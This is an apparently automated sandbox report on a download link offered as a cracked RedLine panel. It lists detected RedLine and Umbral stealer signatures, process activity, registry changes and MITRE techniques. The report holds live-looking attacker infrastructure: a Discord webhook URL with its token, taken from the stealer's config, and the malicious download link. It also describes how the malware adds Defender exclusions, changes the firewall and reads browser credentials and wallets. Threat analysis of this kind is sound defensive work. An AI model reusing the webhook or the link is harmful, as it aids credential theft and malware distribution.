redline | hxxps://zelenka[.]guru/proxy[.]php?link=https%3A%2F%2Fgofile[.]io%2Fd%2FrrVkK9&hash=aee71227bcd2e07805a068cfb8b0c4b2

Resubmissions

21-05-2024 09:18

240521-k9s7jsga63 10

19-05-2024 08:28

240519-kdg5eaaf2t 10

Analysis

max time kernel
163s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
21-05-2024 09:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://zelenka.guru/proxy.php?link=https%3A%2F%2Fgofile.io%2Fd%2FrrVkK9&hash=aee71227bcd2e07805a068cfb8b0c4b2

Score

10^/10

redline umbral evasion execution infostealer spyware stealer upx

Malware Config

Extracted

Family

umbral

https://discordapp.com/api/webhooks/1186062061508239390/wfwPZiGPzytybpy8t2Hsp4XOI3B_k0QMNcH-OzuAphqi3y6_IFvyz8BsbHzw84brTS6o

Signatures

Detect Umbral payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023499-291.dat	family_umbral
behavioral1/memory/2968-292-0x0000000005A70000-0x0000000005AB0000-memory.dmp	family_umbral
behavioral1/memory/6060-589-0x000002B3C8640000-0x000002B3C8680000-memory.dmp	family_umbral

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0009000000023473-222.dat	family_redline
behavioral1/memory/2968-236-0x0000000000920000-0x00000000009C4000-memory.dmp	family_redline
behavioral1/memory/2968-288-0x0000000005800000-0x000000000580E000-memory.dmp	family_redline
behavioral1/files/0x0007000000023498-287.dat	family_redline

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5172	powershell.exe
4296	powershell.exe
5832	powershell.exe
5964	powershell.exe

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
328	netsh.exe
5076	netsh.exe
1020	netsh.exe
2876	netsh.exe
3376	netsh.exe
1684	netsh.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	RedLine.MainPanel-cracked.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	GERDA-Êðèïò â zip.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	RedLine.MainPanel-cracked.exe

Executes dropped EXE 10 IoCs

pid	Process
1240	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
1152	GERDA-Êðèïò â zip.exe
1992	Anarchy.exe
3920	Anarchy.exe
5524	rar.exe
2004	builder.exe
6060	Build.exe
1396	builder.exe
1812	B33uild.exe

Loads dropped DLL 44 IoCs

pid	Process
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
2968	RedLine.MainPanel-cracked.exe
2968	RedLine.MainPanel-cracked.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe
3920	Anarchy.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 39 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3920-333-0x00007FF96D3D0000-0x00007FF96D3F3000-memory.dmp	upx
behavioral1/memory/3920-330-0x00007FF95A9A0000-0x00007FF95AF89000-memory.dmp	upx
behavioral1/memory/3920-332-0x00007FF96E440000-0x00007FF96E44F000-memory.dmp	upx
behavioral1/memory/3920-345-0x00007FF95A7F0000-0x00007FF95A813000-memory.dmp	upx
behavioral1/memory/3920-346-0x00007FF95A670000-0x00007FF95A7E7000-memory.dmp	upx
behavioral1/memory/3920-344-0x00007FF95A820000-0x00007FF95A839000-memory.dmp	upx
behavioral1/memory/3920-343-0x00007FF95B1C0000-0x00007FF95B1ED000-memory.dmp	upx
behavioral1/memory/3920-349-0x00007FF95A610000-0x00007FF95A643000-memory.dmp	upx
behavioral1/memory/3920-348-0x00007FF96DF10000-0x00007FF96DF1D000-memory.dmp	upx
behavioral1/memory/3920-347-0x00007FF95A650000-0x00007FF95A669000-memory.dmp	upx
behavioral1/memory/3920-351-0x00007FF95A020000-0x00007FF95A0ED000-memory.dmp	upx
behavioral1/memory/3920-350-0x00007FF95A0F0000-0x00007FF95A610000-memory.dmp	upx
behavioral1/memory/3920-352-0x00007FF95A000000-0x00007FF95A014000-memory.dmp	upx
behavioral1/memory/3920-353-0x00007FF96DCA0000-0x00007FF96DCAD000-memory.dmp	upx
behavioral1/memory/3920-354-0x00007FF959EE0000-0x00007FF959FFC000-memory.dmp	upx
behavioral1/memory/3920-516-0x00007FF95A9A0000-0x00007FF95AF89000-memory.dmp	upx
behavioral1/memory/3920-543-0x00007FF95A670000-0x00007FF95A7E7000-memory.dmp	upx
behavioral1/memory/3920-552-0x00007FF96D3D0000-0x00007FF96D3F3000-memory.dmp	upx
behavioral1/memory/3920-548-0x00007FF95A020000-0x00007FF95A0ED000-memory.dmp	upx
behavioral1/memory/3920-546-0x00007FF95A610000-0x00007FF95A643000-memory.dmp	upx
behavioral1/memory/3920-544-0x00007FF95A650000-0x00007FF95A669000-memory.dmp	upx
behavioral1/memory/3920-537-0x00007FF95A9A0000-0x00007FF95AF89000-memory.dmp	upx
behavioral1/memory/3920-542-0x00007FF95A7F0000-0x00007FF95A813000-memory.dmp	upx
behavioral1/memory/3920-547-0x00007FF95A0F0000-0x00007FF95A610000-memory.dmp	upx
behavioral1/memory/3920-570-0x00007FF95A0F0000-0x00007FF95A610000-memory.dmp	upx
behavioral1/memory/3920-584-0x00007FF95A610000-0x00007FF95A643000-memory.dmp	upx
behavioral1/memory/3920-583-0x00007FF96DF10000-0x00007FF96DF1D000-memory.dmp	upx
behavioral1/memory/3920-582-0x00007FF95A650000-0x00007FF95A669000-memory.dmp	upx
behavioral1/memory/3920-581-0x00007FF95A670000-0x00007FF95A7E7000-memory.dmp	upx
behavioral1/memory/3920-580-0x00007FF95A7F0000-0x00007FF95A813000-memory.dmp	upx
behavioral1/memory/3920-579-0x00007FF95A820000-0x00007FF95A839000-memory.dmp	upx
behavioral1/memory/3920-578-0x00007FF95B1C0000-0x00007FF95B1ED000-memory.dmp	upx
behavioral1/memory/3920-577-0x00007FF95A9A0000-0x00007FF95AF89000-memory.dmp	upx
behavioral1/memory/3920-576-0x00007FF96E440000-0x00007FF96E44F000-memory.dmp	upx
behavioral1/memory/3920-575-0x00007FF96D3D0000-0x00007FF96D3F3000-memory.dmp	upx
behavioral1/memory/3920-574-0x00007FF959EE0000-0x00007FF959FFC000-memory.dmp	upx
behavioral1/memory/3920-573-0x00007FF96DCA0000-0x00007FF96DCAD000-memory.dmp	upx
behavioral1/memory/3920-572-0x00007FF95A000000-0x00007FF95A014000-memory.dmp	upx
behavioral1/memory/3920-571-0x00007FF95A020000-0x00007FF95A0ED000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
110	ip-api.com
140	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5684	WMIC.exe
1476	wmic.exe
4732	wmic.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
3012	tasklist.exe
2716	tasklist.exe
5956	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5848	systeminfo.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
5288	taskkill.exe
2284	taskkill.exe
5396	taskkill.exe
5160	taskkill.exe
5996	taskkill.exe
4652	taskkill.exe
5296	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133607567203788896"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000000000002000000ffffffff	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\NodeSlot = "5"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0	builder.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff	builder.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\MRUListEx = ffffffff	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	builder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}"	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0 = 5c0031000000000092572c7b10004c49425241527e310000440009000400efbeb5585b4ab5585c4a2e00000071340200000008000000000000000000000000000000f2d410004c0069006200720061007200690065007300000018000000	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 010000000200000000000000ffffffff	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 78003100000000009a5869641100557365727300640009000400efbe874f7748b558514a2e000000c70500000000010000000000000000003a00000000005357ee0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\MRUListEx = 00000000ffffffff	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	builder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616257"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2	builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000100000002000000ffffffff	builder.exe
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	builder.exe

Suspicious behavior: EnumeratesProcesses 47 IoCs

pid	Process
1176	chrome.exe
1176	chrome.exe
5172	powershell.exe
5172	powershell.exe
5108	powershell.exe
5108	powershell.exe
5656	powershell.exe
5656	powershell.exe
5656	powershell.exe
5964	powershell.exe
5964	powershell.exe
5172	powershell.exe
5172	powershell.exe
5108	powershell.exe
5964	powershell.exe
5464	powershell.exe
5464	powershell.exe
5464	powershell.exe
6068	powershell.exe
6068	powershell.exe
6068	powershell.exe
5996	powershell.exe
5996	powershell.exe
5996	powershell.exe
4200	powershell.exe
4200	powershell.exe
4200	powershell.exe
4296	powershell.exe
4296	powershell.exe
5960	powershell.exe
5960	powershell.exe
5112	powershell.exe
5112	powershell.exe
1916	powershell.exe
1916	powershell.exe
4732	powershell.exe
4732	powershell.exe
5832	powershell.exe
5832	powershell.exe
5760	powershell.exe
5760	powershell.exe
3012	powershell.exe
3012	powershell.exe
5528	powershell.exe
5528	powershell.exe
4992	powershell.exe
4992	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2004	builder.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe
1176	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeRestorePrivilege	3488	7zG.exe
Token: 35	3488	7zG.exe
Token: SeSecurityPrivilege	3488	7zG.exe
Token: SeSecurityPrivilege	3488	7zG.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
Token: SeShutdownPrivilege	1176	chrome.exe
Token: SeCreatePagefilePrivilege	1176	chrome.exe
